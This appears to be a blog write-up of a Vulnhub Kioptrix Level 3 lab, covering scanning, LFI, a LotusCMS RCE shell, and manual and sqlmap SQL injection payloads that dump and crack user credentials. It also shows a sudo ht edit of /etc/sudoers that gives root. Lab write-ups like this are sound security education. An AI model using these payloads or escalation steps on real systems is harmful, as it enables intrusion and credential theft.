Vulnhub | Kioptrix Level 3

Anas Ibrahim
8 min readNov 29, 2022

--

Kioptrix Level 3

Hello folks ,

Welcome to 3rd installment of my Kioptrix series. If you’re interested in other parts check Kioptrix1 and Kioptrix2 , Let’s pwn kioptrix3

Installation

You can download kioptrix3 as you can andsetup it in VMware or vireualbox , don’t forget to make the network adapter of kioptrix3 and your machine as bridged

Host Discovery

Netdiscover

I used netdiscover tool to list all the hosts on my network and running it with sudo

mahine ip is 192.168.1.233

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

There’s a web application involved, so to have everything nice and properly displayed you really need to this.

Type the following command to edit the host file and add the following piece of code into it.

Command: sudo nano /etc/hosts

Once we open up and edit the hosts file, make sure it looks similar to below:

127.0.0.1 localhost
127.0.0.1 kali
192.168.1.233 kioptrix3.com

Scanning and Enumeration

Nmap

I used nmap to scan all ports and discover open ports and services.

sudo nmap -p- -sV -O 192.168.1.233

  • -sV : Probe open ports to determine service/version info
  • -O : Enable OS detection
netowrk scanning

So , we have some important result as OS is Linux and apache version apache httpd 2.2.8

You can use apache scanner bash script from GitHub to check if this version vulnerable or not

Oops , this version has 41 vulnerabilities

Web server scanning

Nikto

I used nikto web server scanner tool to get info about kioptrix3 using the following command sudo nikto -h <ip>

nikto result

So, we have some important result like apache version and some important directories like /phpmyadmin is for managing MySQL databases.

Fuzzing

I used dirsearch tool to bruteforcing directory and get important directories with status code 200 using the following command

dirsearch -u "url" --full-url --exclude-code 403

diresearch

So, i found /index.php the main page , index.php/login login page used CMS /gallery Which calls for some pictures from the database

Port 80 : HTTP

Next, let’s fire up Firefox and take a look at the web server.

I found the main page has blog http://kioptrix3.com/index.php?system=blog which has an article and has a comment function , tested stored xss in comment function but the backend uses htmlspecialchars() function and unfortunately it didn’t succeed

LFI

I noticed that system parameter include pages from apache server so, I tested on LFI in system parameter

Unfortunately it didn’t work

I added null byte %00 and tested it again but it didn’t work
So , I added null byte before PNG extension and it succeeded

Getting Shell

I found that apache server has 2 users which I can access it if I get RCE (loneferret , dreg)

Navigate to /login page and I noticed from title is lotusCMS administrator.

Then I used searchsploitfor searching about lotusCMS to check if it has any previous cves , I found it vulnerable to php arbitrary code leading to RCE and it has an exploit on metasploit framework and you can get meterpreter session from msfconsole
But I wanted to search about exploit with bash , I get an exploit in GitHub and I get a shell with www-data user

Using the command ./lotusRCE.sh kioptrix3.com /

To get an interactive shell use command python -c 'import pty;pty.spawn(“/bin/bash")’;

Navigate to gallery directory to list the directory lsthen I found gconfig.php file , I read it with cat command cat gconfig.php and I found database credentials

gconfig.php

Accessing Databases

Username: root
Password : fuckeyou
I used this credentials to login in phpmyadmin login page which managing MySQL databases and it succeeded

phpmyadmin

I logged in as root and i can manage databases , so it has 3 databases name i will check gallery database , dev_accounts table and i can get the md5 hash od password of (loneferret , dreg) users

apache server users credentials

Then i could decrypt hash using https://crackstation.net and the result was password of loneferret => starwars | password of dreg => Mast3r

So , after getting shell with www-data user i could to connect ssh with any user of both , let’s try to connect ssh with loneferret user using the following command ssh loneferret@192.168.1.233 password : starwars

another method to access loneferret user to using su loneferret with password : starwars

Exploiting SQLi Manually

I checked /gallerydirectory , i navigated between photos then i guessed that photos stored in database and the server call photos from it.

then i selected to photo idfrom sorting options

gallery

if you added a bad character in id parameter it would return sql error

so , id parameter may be vulnerable to error based sqli

error based sqli

It returned error in SQL syntax then i could balance the query with or 1=1-- then it returned all photos in this table

So , when I used order bycommand there were 6 columns in table using the following commands
?id=1 order by 1 —

?id=1 order by 2 —

?id=1 order by 3 —

?id=1 order by 4 —

?id=1 order by 5 —

?id=1 order by 6 —

?id=1 order by 7 — it returned an error so this table has 6 columns

order by

Secondly, I used union select command to know which column is vulnerable using the following command

?id=1 union select 1,2,3,4,5,6 -- then , i noticed that column 2 , 3 vulnerable and i can get info from database Through them

union select

Then i would exploit sqli through column 2 , 3 using the following queries

For knowing version and database name

?id=1 union select 1,version(),database(),4,5,6 --

database name : gallery

For knowing all the tables which exists in gallery database

?id=1 union select 1,table_name,2,3,4,5,6 from information_schema.tables where table_schema=gallery --

There was many of tables in gallery database so , i noticed that there was a table_name called dev_accounts it might be has some credentials

For knowing all columns which exists in dev_accounts table

?id=1 union select 1,column_name,3,4,5,6 from information_schema.columns where table_name = 'dev_accounts' --

Then , there was 3 columns id , username , password .

So , i could to concat three columns to retrieve these credentials using the following command

?id=1 union select 1,concat(id , '\n' , username , '\n' , password),3,4,5,6 from dev_accounts --

retrieving credentials from database

It was the same credentials which i found it after getting shell in gconfig.php

Exploiting SQLi using sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch

Knowing the databases name from the following command

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch --dbs

databases name

Knowing the tables_name of gallery database from the following command

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery --tables

tables_name

Knowing the columns_name of dev_accounts table from gallery database using the following command

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery -T dev_accounts --columns

columns_name

Retrieving the crendentials of dev_accounts table from gallery database using the following command

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery -T dev_accounts -C id,username,password --dump

credentials

Privilege Escalation

After getting shell and connected to loneferret successfully , then i can escalating privileges to get root user.

So , reading the company policy file, the CEO is mandating all new employees to run sudo ht for working with files. The sudo -l confirms the fact that we can run sudo ht with root privileges

sudo -l

When i entered sudo htcommand , there was an error as nano error: Error opening terminal: xterm-256color I remedied this issue by executing export TERM=xterm but there are other ways if you’re so inclined, you can see this in this link stackoverflow

Run the command sudo ht and start up the HT editor, it should bring you to a screen with some options. Press F3 to select the Open file option and enter the path to the /etc/sudoers file

privilege escalation

After the file is open, let’s add /bin/sh right after /usr/local/bin/ht, and don’t forget the comma!

privilege scalation

I executed “sudo /bin/sh” and was presented with root.

getting root

You can find the flag in /root/Congrats.txt as shown below.

the flag

Finally, I tried to solve the machine in all possible ways as i could, and I hope that you have benefited, even with a small information.

Contact

Linked-in | Facebook

--

--

Anas Ibrahim